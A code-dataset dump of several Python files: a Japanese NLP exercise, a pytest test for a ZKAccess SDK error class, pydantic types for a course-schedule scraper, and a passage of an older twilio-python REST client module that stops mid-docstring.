blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 5
133
| path
stringlengths 2
333
| src_encoding
stringclasses 30
values | length_bytes
int64 18
5.47M
| score
float64 2.52
5.81
| int_score
int64 3
5
| detected_licenses
listlengths 0
67
| license_type
stringclasses 2
values | text
stringlengths 12
5.47M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
cf8a206bd2639084dca2db1e5cbb7ceec80c855c
|
Python
|
Yanmo/language.processing
|
/py/q004.py
|
UTF-8
| 1,012
| 3.203125
| 3
|
[] |
no_license
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import codecs
import io
# for python 2.x
# sys.stdout = codecs.getwriter('utf_8')(sys.stdout)
# for python 3.x
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
#"Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can."という文を単語に分解し,1, 5, 6, 7, 8, 9, 15, 16, 19番目の単語は先頭の1文字,それ以外の単語は先頭に2文字を取り出し,取り出した文字列から単語の位置(先頭から何番目の単語か)への連想配列(辞書型もしくはマップ型)を作成せよ.
sentence = u"Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can."
words = sentence.replace(",", "").replace(".", "").split()
hit=[1, 5, 6, 7, 8, 9, 15, 16, 19]
print({word[0:1] if words.index(word)+1 in hit else word[0:2] : words.index(word)+1 for word in words})
| true
|
efd11a9778ade94b89315001ac7767c72640fbeb
|
Python
|
yshaath/pyzkaccess
|
/tests/test_exceptions.py
|
UTF-8
| 818
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
import pytest
from pyzkaccess.exceptions import ZKSDKError
class TestZKSDKError:
def test_init__should_initialize_right_parameters(self):
obj = ZKSDKError('my message', -5)
assert obj.msg == 'my message'
assert obj.err == -5
@pytest.mark.parametrize('errno,description', (
(-5, 'SDK error -5: The length of the read data is not correct'),
(10066, 'WINSOCK error 10066: WSAENOTEMPTY (Directory not empty. Cannot remove a directory that is not empty)'),
(100500, 'Unknown error 100500'),
(-9000, 'Unknown error -9000'),
))
def test_str__should_return_error_description_and_message(self, errno, description):
expect = 'my message: {}'.format(description)
obj = ZKSDKError('my message', errno)
assert str(obj) == expect
| true
|
4c1404e818a669b257840092e6a1678bac0f71d1
|
Python
|
jackharrhy/muntrunk
|
/muntrunk/types.py
|
UTF-8
| 6,046
| 2.78125
| 3
|
[] |
no_license
|
from dataclasses import dataclass
from pydantic import BaseModel
from typing import Any, List, Optional, ForwardRef
Campus = ForwardRef("Campus")
class CommonTypes(BaseModel):
campuses: dict
instructors: dict
buildings: dict
rooms: dict
sessions: dict
subjects: dict
common_types = CommonTypes(
campuses={}, instructors={}, buildings={}, rooms={}, sessions={}, subjects={},
)
class Building(BaseModel):
letter: str
campus: Campus
def grab(letter, campus_name):
if not letter:
return None
key = f"{campus_name}_{letter}"
if not letter in common_types.buildings:
new_building = Building(letter=letter, campus=Campus.grab(campus_name))
common_types.buildings[key] = new_building
return new_building
else:
return common_types.buildings[key]
class Room(BaseModel):
building: Building
number: str
def grab(building, number):
if not building:
return None
key = f"{building.campus.name}_{building.letter}_{number}"
if not number in common_types.rooms:
new_room = Room(building=building, number=number)
common_types.rooms[key] = new_room
return new_room
else:
return common_types.rooms[key]
class Instructor(BaseModel):
name: str
def grab(name):
if not name:
return None
if not name in common_types.instructors:
new_instructor = Instructor(name=name)
common_types.instructors[name] = new_instructor
return new_instructor
else:
return common_types.instructors[name]
class Campus(BaseModel):
name: str
def grab(name):
if not name:
return None
if not name in common_types.campuses:
new_campus = Campus(name=name)
common_types.campuses[name] = new_campus
return new_campus
else:
return common_types.campuses[name]
class Session(BaseModel):
name: str
def grab(name):
if not name:
return None
if not name in common_types.sessions:
new_session = Session(name=name)
common_types.sessions[name] = new_session
return new_session
else:
return common_types.sessions[name]
class Subject(BaseModel):
name: str
def grab(name):
if not name:
return None
if not name in common_types.subjects:
new_subject = Subject(name=name)
common_types.subjects[name] = new_subject
return new_subject
else:
return common_types.subjects[name]
class Slot(BaseModel):
days_of_week: List[str]
begin: Optional[int]
end: Optional[int]
building: Optional[Building]
room: Optional[Room]
meta: List[str]
def from_piece(piece):
building = Building.grab(piece["room"]["building"], piece["campus"])
room = Room.grab(building, piece["room"]["room"])
return Slot(
days_of_week=piece["days"],
begin=piece["begin"],
end=piece["end"],
building=building,
room=room,
meta=[],
)
class Section(BaseModel):
crn: int
primary_instructor: Optional[Instructor]
secondary_instructor: Optional[Instructor]
wait_list: bool
pre_check: bool
schedule_type: Optional[str]
lab_sections: List[int]
credit_hours: int
billed_hours: Optional[int]
slots: List[Slot]
meta: List[str]
def from_piece(piece):
primary_instructor = Instructor.grab(piece["instructor"]["primary"])
secondary_instructor = Instructor.grab(piece["instructor"]["secondary"])
return Section(
crn=piece["crn"],
primary_instructor=primary_instructor,
secondary_instructor=secondary_instructor,
wait_list=piece["waitList"],
pre_check=piece["preCheck"],
schedule_type=piece["schedType"],
lab_sections=piece["labSections"],
credit_hours=piece["creditHours"],
billed_hours=piece["billHours"],
slots=[],
meta=[],
)
class Course(BaseModel):
campus: Campus
session: Session
subject: Subject
number: str
name: Optional[str]
sections: List[Section]
meta: List[str]
def from_piece(piece):
campus = Campus.grab(piece["campus"])
session = Session.grab(piece["session"])
subject = Subject.grab(piece["course"]["subject"])
return Course(
campus=campus,
session=session,
subject=subject,
number=piece["course"]["number"],
name=piece["course"]["name"],
sections=[],
meta=[],
)
class Semester(BaseModel):
year: int
term: int
level: int
courses: List[Course]
Campus.update_forward_refs()
Building.update_forward_refs()
@dataclass
class Types:
course: Any = None
section: Any = None
slot: Any = None
def types_from_piece(valid, piece):
types = Types(None, None, None)
if valid.course:
types.course = Course.from_piece(piece)
contains_time = valid.begin and valid.end
is_on_campus = contains_time and (
valid.crn or valid.schedule or valid.days_of_the_week
)
is_online = piece["slot"] == 99
is_edge_case_but_valid = valid.crn and valid.schedule
if is_on_campus or is_online or is_edge_case_but_valid:
if valid.crn:
types.section = Section.from_piece(piece)
if valid.course:
types.course.sections.append(types.section)
if valid.days_of_the_week:
types.slot = Slot.from_piece(piece)
if types.section:
types.section.slots.append(types.slot)
if not types.course and not types.section and not types.slot:
return None
return types
| true
|
d070beaaf8cc604e846d0065a08e94ac8b1e6703
|
Python
|
gtracy/twilio-demo
|
/app_engine/twilio/rest/resources.py
|
UTF-8
| 44,928
| 2.515625
| 3
|
[
"MIT"
] |
permissive
|
import datetime
import logging
import twilio
from twilio import TwilioException
from twilio import TwilioRestException
from urllib import urlencode
from urlparse import urlparse
# import json
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
from django.utils import simplejson as json
# import httplib2
try:
import httplib2
except ImportError:
from twilio.contrib import httplib2
def transform_params(p):
"""
Transform parameters, throwing away any None values
and convert False and True values to strings
"""
p = [(d, convert_boolean(p[d])) for d in p if p[d] is not None]
return dict(p)
def parse_date(d):
"""
Return a string representation of a date that the Twilio API understands
Format is YYYY-MM-DD. Returns None if d is not a string, datetime, or date
"""
if isinstance(d, datetime.datetime):
return str(d.date())
elif isinstance(d, datetime.date):
return str(d)
elif isinstance(d, str):
return d
def convert_boolean(bool):
if bool == True:
return "true"
elif bool == False:
return "false"
else:
return bool
def convert_case(s):
"""
Given a string in snake case, conver to CamelCase
"""
return ''.join([a.title() for a in s.split("_") if a])
def convert_keys(d):
"""
Return a dictionary with all keys converted from arguments
"""
special = {
"started_before": "StartTime<",
"started_after": "StartTime>",
"started": "StartTime",
"ended_before": "EndTime<",
"ended_after": "EndTime>",
"ended": "EndTime",
"from_": "From",
}
result = {}
for k, v in d.iteritems():
if k in special:
result[special[k]] = v
else:
result[convert_case(k)] = v
return result
def normalize_dates(myfunc):
def inner_func(*args, **kwargs):
for k, v in kwargs.iteritems():
res = [True for s in ["after", "before", "on"] if s in k]
if len(res):
kwargs[k] = parse_date(v)
return myfunc(*args, **kwargs)
return inner_func
class Response(object):
"""
Take a httplib2 response and turn it into a requests response
"""
def __init__(self, httplib_resp, content, url):
self.content = content
self.cached = False
self.status_code = int(httplib_resp.status)
self.ok = self.status_code < 400
self.url = url
def make_request(method, url,
params=None, data=None, headers=None, cookies=None, files=None,
auth=None, timeout=None, allow_redirects=False, proxies=None):
"""Sends an HTTP request Returns :class:`Response <models.Response>`
See the requests documentation for explanation of all these parameters
Currently timeout, allow_redirects, proxies, files, and cookies
are all ignored
"""
http = httplib2.Http()
if auth is not None:
http.add_credentials(auth[0], auth[1])
if data is not None:
data = urlencode(data)
if params is not None:
enc_params = urlencode(params, doseq=True)
if urlparse(url).query:
url = '%s&%s' % (url, enc_params)
else:
url = '%s?%s' % (url, enc_params)
resp, content = http.request(url, method, headers=headers, body=data)
# Format httplib2 reqeusts as reqeusts objects
return Response(resp, content, url)
def make_twilio_request(method, uri, **kwargs):
"""
Make a request to Twilio. Throws an error
"""
headers = kwargs.get("headers", {})
headers["User-Agent"] = "twilio-python/%s" % twilio.__version__
if method == "POST" and "Content-Type" not in headers:
headers["Content-Type"] = "application/x-www-form-urlencoded"
kwargs["headers"] = headers
if "Accept" not in headers:
headers["Accept"] = "application/json"
uri = uri + ".json"
resp = make_request(method, uri, **kwargs)
if not resp.ok:
try:
error = json.loads(resp.content)
message = "%s: %s" % (error["code"], error["message"])
except:
message = resp.content
raise TwilioRestException(resp.status_code, resp.url, message)
return resp
class Resource(object):
"""A REST Resource"""
name = "Resource"
def __init__(self, base_uri, auth):
self.base_uri = base_uri
self.auth = auth
def __eq__(self, other):
return (isinstance(other, self.__class__)
and self.__dict__ == other.__dict__)
def __ne__(self, other):
return not self.__eq__(other)
def request(self, method, uri, **kwargs):
"""
Send an HTTP request to the resource.
Raise a TwilioRestException
"""
resp = make_twilio_request(method, uri, auth=self.auth, **kwargs)
logging.debug(resp.content)
if method == "DELETE":
return resp, {}
else:
return resp, json.loads(resp.content)
@property
def uri(self):
format = (self.base_uri, self.name)
return "%s/%s" % format
class InstanceResource(Resource):
subresources = []
def __init__(self, parent, sid):
self.parent = parent
self.name = sid
super(InstanceResource, self).__init__(parent.uri,
parent.auth)
def load(self, entries):
if "from" in entries.keys():
entries["from_"] = entries["from"]
del entries["from"]
if "uri" in entries.keys():
del entries["uri"]
self.__dict__.update(entries)
def load_subresources(self):
"""
Load all subresources
"""
for resource in self.subresources:
list_resource = resource(self.uri, self.parent.auth)
self.__dict__[list_resource.key] = list_resource
def update_instance(self, **kwargs):
a = self.parent.update(self.name, **kwargs)
self.load(a.__dict__)
def delete_instance(self):
return self.parent.delete(self.name)
class ListResource(Resource):
name = "Resources"
instance = InstanceResource
def __init__(self, *args, **kwargs):
super(ListResource, self).__init__(*args, **kwargs)
try:
self.key
except AttributeError:
self.key = self.name.lower()
def get(self, sid):
"""Return an instance resource """
return self.get_instance(sid)
def get_instance(self, sid):
"""Request the specified instance resource"""
uri = "%s/%s" % (self.uri, sid)
resp, item = self.request("GET", uri)
return self.load_instance(item)
def get_instances(self, params=None, page=None, page_size=None):
"""
Query the list resource for a list of InstanceResources
"""
params = params or {}
if page is not None:
params["Page"] = page
if page_size is not None:
params["PageSize"] = page_size
resp, page = self.request("GET", self.uri, params=params)
if self.key not in page:
raise TwilioException("Key %s not present in response" % self.key)
return [self.load_instance(ir) for ir in page[self.key]]
def create_instance(self, body):
"""
Create an InstanceResource via a POST to the List Resource
:param dict body: Dictoionary of POST data
"""
resp, instance = self.request("POST", self.uri, data=body)
if resp.status_code != 201:
raise TwilioRestException(resp.status,
self.uri, "Resource not created")
return self.load_instance(instance)
def delete_instance(self, sid):
"""
Delete an InstanceResource via DELETE
body: string -- HTTP Body for the quest
"""
uri = "%s/%s" % (self.uri, sid)
resp, instance = self.request("DELETE", uri)
return resp.status_code == 204
def update_instance(self, sid, body):
"""
Update an InstanceResource via a POST
sid: string -- String identifier for the list resource
body: string -- Dict of items to POST
"""
uri = "%s/%s" % (self.uri, sid)
resp, entry = self.request("POST", uri, data=body)
return self.load_instance(entry)
def count(self):
"""
Return the number of instance resources contained in this list resource
"""
resp, page = self.request("GET", self.uri)
return page["total"]
def iter(self, **kwargs):
"""
Return all instance resources using an iterator
Can only be called on classes which implement list()
TODO Make this use the next_url instead
"""
p = 0
try:
while True:
for r in self.list(page=p, **kwargs):
yield r
p += 1
except TwilioRestException:
pass
def load_instance(self, data):
instance = self.instance(self, data["sid"])
instance.load(data)
instance.load_subresources()
return instance
class AvailablePhoneNumber(InstanceResource):
""" An available phone number resource """
def __init__(self, parent):
super(AvailablePhoneNumber, self).__init__(parent, "")
self.name = ""
def purchase(self, **kwargs):
return self.parent.purchase(phone_number=self.phone_number,
**kwargs)
class AvailablePhoneNumbers(ListResource):
name = "AvailablePhoneNumbers"
key = "available_phone_numbers"
instance = AvailablePhoneNumber
types = {"local": "Local", "tollfree": "TollFree"}
def __init__(self, base_uri, auth, phone_numbers):
super(AvailablePhoneNumbers, self).__init__(base_uri, auth)
self.phone_numbers = phone_numbers
def get(self, sid):
raise TwilioException("Individual AvailablePhoneNumbers have no sid")
def list(self, type="local", country="US", region=None, area_code=None,
postal_code=None, near_number=None, near_lat_long=None, lata=None,
rate_center=None, distance=None, contains=None):
"""
Search for phone numbers
"""
params = transform_params({
"InRegion": region,
"InPostalCode": postal_code,
"Contains": contains,
"AreaCode": area_code,
"InLata": lata,
"InRateCenter": rate_center,
"Distance": distance,
"NearNumber": near_number,
"NearLatLong": near_lat_long,
})
uri = "%s/%s/%s" % (self.uri, country, self.types[type])
resp, page = self.request("GET", uri, params=params)
return [self.load_instance(i) for i in page[self.key]]
def load_instance(self, data):
instance = self.instance(self.phone_numbers)
instance.load(data)
instance.load_subresources()
return instance
class Transcription(InstanceResource):
pass
class Transcriptions(ListResource):
name = "Transcriptions"
instance = Transcription
def list(self, **kwargs):
"""
Return a list of :class:`Transcription` resources
"""
return self.get_instances(**kwargs)
class Recording(InstanceResource):
subresources = [
Transcriptions,
]
def __init__(self, *args, **kwargs):
super(Recording, self).__init__(*args, **kwargs)
self.formats = {
"mp3": self.uri + ".mp3",
"wav": self.uri + ".wav",
}
def delete(self):
"""
Delete this recording
"""
return self.delete_instance()
class Recordings(ListResource):
name = "Recordings"
instance = Recording
@normalize_dates
def list(self, call_sid=None, before=None, after=None, **kwargs):
"""
Returns a page of :class:`Recording` resources as a list.
For paging informtion see :class:`ListResource`.
:param date after: Only list recordings logged after this datetime
:param date before: Only list recordings logger before this datetime
:param call_sid: Only list recordings from this :class:`Call`
"""
params = transform_params({
"CallSid": call_sid,
"DateCreated<": before,
"DateCreated>": after,
})
return self.get_instances(params=params)
def delete(self, sid):
"""
Delete the given recording
"""
return self.delete_instance(sid)
class Notification(InstanceResource):
def delete(self):
"""
Delete this notification
"""
return self.delete_instance()
class Notifications(ListResource):
name = "Notifications"
instance = Notification
@normalize_dates
def list(self, before=None, after=None, log_level=None, **kwargs):
"""
Returns a page of :class:`Notification` resources as a list.
For paging informtion see :class:`ListResource`.
**NOTE**: Due to the potentially voluminous amount of data in a
notification, the full HTTP request and response data is only returned
in the Notification instance resource representation.
:param date after: Only list notifications logged after this datetime
:param date before: Only list notifications logger before this datetime
:param log_level: If 1, only shows errors. If 0, only show warnings
"""
params = transform_params({
"MessageDate<": before,
"MessageDate>": after,
"LogLevel": log_level,
})
return self.get_instances(params=params, **kwargs)
def delete(self, sid):
"""
Delete a given Notificiation
"""
return self.delete_instance(sid)
class Call(InstanceResource):
""" A call resource """
BUSY = "busy"
CANCELED = "canceled"
COMPLETED = "completed"
FAILED = "failed"
IN_PROGRESS = "in-progress"
NO_ANSWER = "no-answer"
QUEUED = "queued"
RINGING = "ringing"
subresources = [
Notifications,
Recordings,
]
def hangup(self):
""" If this call is currenlty active, hang up the call.
If this call is scheduled to be made, remove the call
from the queue
"""
a = self.parent.hangup(self.name)
self.load(a.__dict__)
def cancel(self):
""" If the called is queued or rining, cancel the calls.
Will not affect in progress calls
"""
a = self.parent.cancel(self.name)
self.load(a.__dict__)
def route(self, **kwargs):
"""Route the specified :class:`Call` to another url.
:param url: A valid URL that returns TwiML.
:param method: HTTP method Twilio uses when requesting the above URL.
"""
a = self.parent.route(self.name, **kwargs)
self.load(a.__dict__)
class Calls(ListResource):
""" A list of Call resources """
name = "Calls"
instance = Call
@normalize_dates
def list(self, to=None, from_=None, status=None, ended_after=None,
ended_before=None, ended=None, started_before=None,
started_after=None, started=None, **kwargs):
"""
Returns a page of :class:`Call` resources as a list. For paging
informtion see :class:`ListResource`
:param date after: Only list calls started after this datetime
:param date before: Only list calls started before this datetime
"""
params = transform_params({
"To": to,
"From": from_,
"Status": status,
"StartTime<": started_before,
"StartTime>": started_after,
"StartTime": parse_date(started),
"EndTime<": ended_before,
"EndTime>": ended_after,
"EndTime": parse_date(ended),
})
return self.get_instances(params=params, **kwargs)
def create(self, to, from_, url, method=None, fallback_url=None,
fallback_method=None, status_callback=None, status_method=None,
if_machine=None, send_digits=None, timeout=None,
application_sid=None):
"""
Make a phone call to a number
"""
params = transform_params({
"To": to,
"From": from_,
"Url": url,
"Method": method,
"FallbackUrl": fallback_url,
"FallbackMethod": fallback_method,
"StatusCallback": status_callback,
"StatusCallbackMethod": status_method,
"SendDigits": send_digits,
"Timeout": timeout,
"IfMachine": if_machine,
"ApplicationSid": application_sid,
})
return self.create_instance(params)
def update(self, sid, status=None, method=None, url=None):
params = transform_params({
"Status": status,
"Url": url,
"Method": method,
})
return self.update_instance(sid, params)
def cancel(self, sid):
""" If this call is queued or ringing, cancel the call
Will not affect in-progress calls.
:param sid: A Call Sid for a specific call
:returns: Updated :class:`Call` resource
"""
return self.update(sid, status=Call.CANCELED)
def hangup(self, sid):
""" If this call is currenlty active, hang up the call.
If this call is scheduled to be made, remove the call
from the queue
:param sid: A Call Sid for a specific call
:returns: Updated :class:`Call` resource
"""
return self.update(sid, status=Call.COMPLETED)
def route(self, sid, url, method="POST"):
"""Route the specified :class:`Call` to another url.
:param sid: A Call Sid for a specific call
:param url: A valid URL that returns TwiML.
:param method: The HTTP method Twilio uses when requesting the URL.
:returns: Updated :class:`Call` resource
"""
return self.update(sid, url=url, method=method)
class CallerId(InstanceResource):
def delete(self):
"""
Deletes this caller ID from the account.
"""
return self.delete_instance()
def update(self, **kwargs):
"""
Update the CallerId
"""
self.update_instance(**kwargs)
class CallerIds(ListResource):
""" A list of :class:`CallerId` resources """
name = "OutgoingCallerIds"
key = "outgoing_caller_ids"
instance = CallerId
def delete(self, sid):
"""
Deletes a specific :class:`CallerId` from the account.
"""
self.delete_instance(sid)
def list(self, phone_number=None, friendly_name=None, **kwargs):
"""
:param phone_number: Show caller ids with this phone number.
:param friendly_name: Show caller ids with this friendly name.
"""
params = transform_params({
"PhoneNumber": phone_number,
"FrienldyName": friendly_name,
})
return self.get_instances(params=params, **kwargs)
def update(self, sid, friendly_name=None):
"""
Update a specific :class:`CallerId`
"""
params = transform_params({
"FriendlyName": friendly_name,
})
return self.update_instance(sid, params)
def validate(self, phone_number, friendly_name=None, call_delay=None,
extension=None):
"""
Begin the validation procress for the given number.
Returns a dictionary with the following keys
**account_sid**:
The unique id of the Account to which the Validation Request belongs.
**phone_number**: The incoming phone number being validated,
formatted with a '+' and country code e.g., +16175551212
**friendly_name**: The friendly name you provided, if any.
**validation_code**: The 6 digit validation code that must be entered
via the phone to validate this phone number for Caller ID.
:param phone_number: The phone number to call and validate
:param friendly_name: A description for the new caller ID
:param call_delay: Number of seconds to delay the validation call.
:param extension: Digits to dial after connecting the validation call.
:returns: A response dictionary
"""
params = transform_params({
"PhoneNumber": phone_number,
"FriendlyName": friendly_name,
"CallDelay": call_delay,
"Extension": extension,
})
resp, validation = self.request("POST", self.uri, data=params)
return validation
class PhoneNumber(InstanceResource):
def trasfer(self, account_sid):
"""
Transfer the phone number with sid from the current account to another
identified by account_sid
"""
pass
def update(self, **kwargs):
"""
Update this phone number instance
"""
a = self.parent.update(self.name, **kwargs)
self.load(a.__dict__)
def delete(self):
"""
Release this phone number from your account. Twilio will no longer
answer calls to this number, and you will stop being billed the monthly
phone number fees. The phone number will eventually be recycled and
potentially given to another customer, so use with care. If you make a
mistake, contact us... we may be able to give you the number back.
"""
return self.parent.delete(self.name)
class PhoneNumbers(ListResource):
name = "IncomingPhoneNumbers"
key = "incoming_phone_numbers"
instance = PhoneNumber
def __init__(self, base_uri, auth):
super(PhoneNumbers, self).__init__(base_uri, auth)
self.available_phone_numbers = \
AvailablePhoneNumbers(base_uri, auth, self)
def delete(self, sid):
"""
Release this phone number from your account. Twilio will no longer
answer calls to this number, and you will stop being billed the
monthly phone number fees. The phone number will eventually be
recycled and potentially given to another customer, so use with care.
If you make a mistake, contact us... we may be able to give you the
number back.
"""
return self.delete_instance(sid)
def list(self, phone_number=None, friendly_name=None, **kwargs):
"""
:param phone_number: Show phone numbers that match this pattern.
:param friendly_name: Show phone numbers with this friendly name
You can specify partial numbers and use '*' as a wildcard.
"""
params = transform_params({
"PhoneNumber": phone_number,
"FriendlyName": friendly_name,
})
return self.get_instances(params=params, **kwargs)
def purchase(self, phone_number=None, area_code=None, voice_url=None,
voice_method=None, voice_fallback_url=None,
voice_fallback_method=None,
status_callback_url=None, status_callback_method=None,
sms_url=None, sms_method=None, sms_fallback_url=None,
sms_fallback_method=None, voice_caller_id_lookup=None,
account_sid=None, application_sid=None):
"""
Attempt to purchase the specified number. The only required parameters
are **either** phone_number or area_code
:returns: Returns a :class:`PhoneNumber` instance on success,
:data:`False` on failure
"""
params = transform_params({
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"VoiceFallbackUrl": voice_fallback_url,
"VoiceFallbackMethod": voice_fallback_method,
"SmsUrl": sms_url,
"SmsMethod": sms_method,
"SmsFallbackUrl": sms_fallback_url,
"SmsFallbackMethod": sms_fallback_method,
"StatusCallback": status_callback_url,
"StatusCallbackMethod": status_callback_method,
"VoiceCallerIdLookup": voice_caller_id_lookup,
"AccountSid": account_sid,
"ApplicationSid": application_sid,
})
if phone_number:
params["PhoneNumber"] = phone_number
elif area_code:
params["AreaCode"] = area_code
else:
raise TypeError("phone_number or area_code is required")
return self.create_instance(params)
def search(self, **kwargs):
"""
:param type: The type of phone number to search for.
:param integer country: Either "US" or "CA". Defaults to "US"
:param string region: When searching the US, show numbers in this state
:param string postal_code: Only show numbers in this area code
:param string rate_center: US only.
:param tuple near_lat_long: Find close numbers within Distance miles.
:param integer distance: Search radius for a Near- query in miles.
"""
return self.available_phone_numbers.list(**kwargs)
def trasfer(self, sid, account_sid):
"""
Transfer the phone number with sid from the current account to another
identified by account_sid
"""
return self.update_instance(sid, {"Url": url, "Method": method})
def update(self, sid, api_version=None, voice_url=None, voice_method=None,
voice_fallback_url=None, voice_fallback_method=None,
status_callback_method=None, sms_url=None, sms_method=None,
sms_fallback_url=None, sms_fallback_method=None,
voice_caller_id_lookup=None, account_sid=None,
application_sid=None):
"""
Update this phone number instance
"""
params = transform_params({
"ApiVersion": api_version,
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"VoiceFallbackUrl": voice_fallback_url,
"VoiceFallbackMethod": voice_fallback_method,
"StatusCallbackMethod": status_callback_method,
"SmsUrl": sms_url,
"SmsMethod": sms_method,
"SmsFallbackUrl": sms_fallback_url,
"SmsFallbackMethod": sms_fallback_method,
"VoiceCallerIdLookup": voice_caller_id_lookup,
"AccountSid": account_sid,
"ApplicationSid": application_sid,
})
return self.update_instance(sid, params)
class Sandbox(InstanceResource):
id_key = "pin"
def update(self, **kwargs):
"""
Update your Twilio Sandbox
"""
a = self.parent.update(**kwargs)
self.load(a.__dict__)
class Sandboxes(ListResource):
name = "Sandbox"
instance = Sandbox
def get(self):
"""Request the specified instance resource"""
return self.get_instance(self.uri)
def update(self, voice_url=None, voice_method=None, sms_url=None,
sms_method=None):
"""
Update your Twilio Sandbox
"""
data = transform_params({
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"SmsUrl": sms_url,
"SmsMethod": sms_method,
})
resp, entry = self.request("POST", self.uri, body=body)
return self.create_instance(entry)
class Sms(object):
"""
Holds all the specific SMS list resources
"""
name = "SMS"
key = "sms"
def __init__(self, base_uri, auth):
self.uri = "%s/SMS" % base_uri
self.messages = SmsMessages(self.uri, auth)
self.short_codes = ShortCodes(self.uri, auth)
class SmsMessage(InstanceResource):
pass
class SmsMessages(ListResource):
name = "Messages"
key = "sms_messages"
instance = SmsMessage
def create(self, to=None, from_=None, body=None, status_callback=None,
application_sid=None):
"""
Create and send a SMS Message.
:param to: The destination phone number.
:param from_: The phone number sending this message.
:param body: The message you want to send, limited to 160 characters.
:param status_callback: URL that Twilio will update with message info
"""
params = transform_params({
"To": to,
"From": from_,
"Body": body,
"StatusCallback": status_callback,
"ApplicationSid": application_sid,
})
return self.create_instance(params)
def list(self, to=None, from_=None, before=None, after=None, **kwargs):
"""
Returns a page of :class:`SMSMessage` resources as a list. For
paging informtion see :class:`ListResource`.
:param to: Only show SMS messages to this phone number.
:param from_: Onlye show SMS message from this phone number.
:param date after: Only list recordings logged after this datetime
:param date before: Only list recordings logger before this datetime
"""
params = transform_params({
"To": to,
"From": from_,
"DateSent<": before,
"DateSent>": after,
})
return self.get_instances(params=params, **kwargs)
class ShortCode(InstanceResource):
def update(self, **kwargs):
return self.parent.update(self.name, **kwargs)
class ShortCodes(ListResource):
name = "ShortCodes"
key = "short_codes"
instance = ShortCode
def list(self, short_code=None, friendly_name=None, **kwargs):
"""
Returns a page of :class:`ShortCode` resources as a list. For
paging informtion see :class:`ListResource`.
:param short_code: Only show the ShortCode resources that match this
pattern. You can specify partial numbers and use '*'
as a wildcard for any digit.
:param friendly_name: Only show the ShortCode resources with friendly
names that exactly match this name.
"""
params = transform_params({
"ShortCode": short_code,
"FriendlyName": friendly_name,
})
return self.get_instances(params=params, **kwargs)
def update(self, sid, friendly_name=None, api_version=None, url=None,
method=None, fallback_url=None, fallback_method=None):
"""
Returns a page of :class:`SMSMessage` resources as a list. For
paging informtion see :class:`ListResource`.
:param friendly_name: Description of the short code, with maximum
length 64 characters.
:param api_version: SMSs to this short code will start a new TwiML
session with this API version.
:param url: The URL that Twilio should request when somebody sends an
SMS to the short code.
:param method: The HTTP method that should be used to request the url.
:param fallback_url: A URL that Twilio will request if an error occurs
requesting or executing the TwiML at the url.
:param fallback_method: The HTTP method that should be used to request
the fallback_url.
"""
params = transform_params({
"FriendlyName": friendly_name,
"ApiVersion": api_version,
"SmsUrl": url,
"SmsMethod": method,
"SmsFallbackUrl": fallback_url,
"SmsFallbackMethod": fallback_method,
})
return self.update_instance(sid, params)
class Participant(InstanceResource):
id_key = "call_sid"
def mute(self):
"""
Mute the participant
"""
self.update_instance(muted="true")
def unmute(self):
"""
Unmute the participant
"""
self.update_instance(muted="false")
def kick(self):
"""
Remove the participant from the given conference
"""
self.delete_instance()
class Participants(ListResource):
name = "Participants"
instance = Participant
def list(self, muted=None, **kwargs):
"""
Returns a list of :class:`Participant` resources in the given
conference
:param conference_sid: Conference this participant is part of
:param boolean muted: If True, only show participants who are muted
"""
params = transform_params({
"Muted": muted,
})
return self.get_instances(params=params, **kwargs)
def mute(self, call_sid):
"""
Mute the given participant
"""
return self.update(call_sid, muted=True)
def unmute(self, call_sid):
"""
Unmute the given participant
"""
return self.update(call_sid, muted=False)
def kick(self, call_sid):
"""
Remove the participant from the given conference
"""
return self.delete(call_sid)
def delete(self, call_sid):
"""
Remove the participant from the given conference
"""
return self._delete(call_sid)
def update(self, sid, muted=None):
"""
:param sid: Paticipant identifier
:param boolean muted: If true, mute this participant
"""
params = transform_params({
"Muted": muted
})
return self.update_instance(sid, params)
class Conference(InstanceResource):
subresources = [
Participants
]
class Conferences(ListResource):
name = "Conferences"
instance = Conference
def list(self, status=None, friendly_name=None, updated_before=None,
updated_after=None, created_after=None, created_before=None,
updated=None, created=None, **kwargs):
"""
Return a list of :class:`Conference` resources
:param status: Show conferences with this status
:param frienldy_name: Show conferences with this exact frienldy_name
:param date updated_after: List conferences updated after this date
:param date updated_before: List conferences updated before this date
:param date created_after: List conferences created after this date
:param date created_before: List conferences created before this date
"""
params = transform_params({
"Status": status,
"FriendlyName": friendly_name,
"DateUpdated<": updated_before,
"DateUpdated>": updated_after,
"DateUpdated": updated,
"DateCreated<": created_before,
"DateCreated>": created_after,
"DateCreated": created,
})
return self.get_instance(params=params, **kwargs)
class Application(InstanceResource):
""" An application resource """
def update(self, **kwargs):
"""
Update this application
"""
return self.parent.update(self.sid, **kwargs)
def delete(self):
"""
Delete this application
"""
return self.parent.delete(self.sid)
class Applications(ListResource):
name = "Applications"
instance = Application
def list(self, friendly_name=None, **kwargs):
"""
Returns a page of :class:`Application` resources as a list. For paging
informtion see :class:`ListResource`
:param date friendly_name: List applications with this friendly name
"""
params = transform_params({
"FriendlyName": friendly_name,
})
return self.get_instances(params=params, **kwargs)
def create(self, friendly_name=None, api_version=None, voice_url=None,
voice_method=None, voice_fallback_url=None,
voice_fallback_method=None, status_callback=None,
status_callback_method=None, voice_caller_id_lookup=None,
sms_url=None, sms_method=None, sms_fallback_url=None,
sms_status_callback=None):
"""
Update an :class:`Application` with any of these optional parameters.
:param friendly_name: A human readable description of the application,
with maximum length 64 characters.
:param api_version: Requests to this application's URLs will start a
new TwiML session with this API version.
Either 2010-04-01 or 2008-08-01.
:param voice_url: The URL that Twilio should request when somebody
dials a phone number assigned to this application.
:param voice_method: The HTTP method that should be used to request the
VoiceUrl. Either GET or POST.
:param voice_fallback_url: A URL that Twilio will request if an error
occurs requesting or executing the TwiML
defined by VoiceUrl.
:param voice_fallback_method: The HTTP method that should be used to
